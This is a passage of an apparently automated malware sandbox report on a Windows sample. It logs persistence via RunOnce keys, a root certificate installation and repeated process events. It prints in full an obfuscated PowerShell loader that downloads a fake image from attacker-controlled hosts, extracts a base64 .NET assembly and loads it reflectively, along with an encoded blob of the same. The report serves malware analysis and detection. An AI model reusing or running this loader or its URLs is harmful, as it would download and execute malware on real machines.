QBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -execJump to behavior
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D81D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6A1D81D28

            Persistence and Installation Behavior

            barindex
            Installs new ROOT certificates
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D81684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF6A1D81684
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
